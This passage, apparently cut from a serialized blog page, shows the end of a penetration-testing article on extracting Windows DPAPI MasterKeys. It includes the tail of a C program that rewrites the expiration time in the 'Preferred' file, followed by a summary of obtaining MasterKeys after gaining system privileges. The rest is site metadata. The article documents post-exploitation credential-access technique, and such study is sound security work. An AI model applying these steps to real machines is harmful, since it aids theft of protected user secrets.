fwrite(&amp;ft.dwLowDateTime,sizeof(int),1,fp);\u003Cbr>\tfwrite(&amp;ft.dwHighDateTime,sizeof(int),1,fp);\u003Cbr>\tfclose(fp);\u003Cbr>\tprintf(\"[+]Change success.\\n\");\u003Cbr>\treturn 0;  \u003Cbr>} \u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Read the Preferred file and set the expiration time to 2019-12-30 12:30:30\u003C\u002Fp>\u003Cp>After modification, re-read the Preferred file information, successfully modified, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019870935_6_c21fb211e8-1.png\">\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article summarizes the method of obtaining the MasterKey after gaining Windows system privileges, writing a program to automatically analyze the Preferred file format and extend the validity period of the MasterKey\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1647,"Onedaysec",4,"published","2026-02-02T08:19:47.664Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"DPAPI MasterKey Extraction on Windows: Techniques & Analysis","DPAPI, MasterKey, Windows security, penetration testing, mimikatz, Preferred file, data decryption",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46],135,134,132,{"title":39,"description":39,"image":39},"2026-07-24T15:37:15.227Z","2026-07-23T16:01:03.884Z","draft","2026-07-23T16:03:55.546Z"]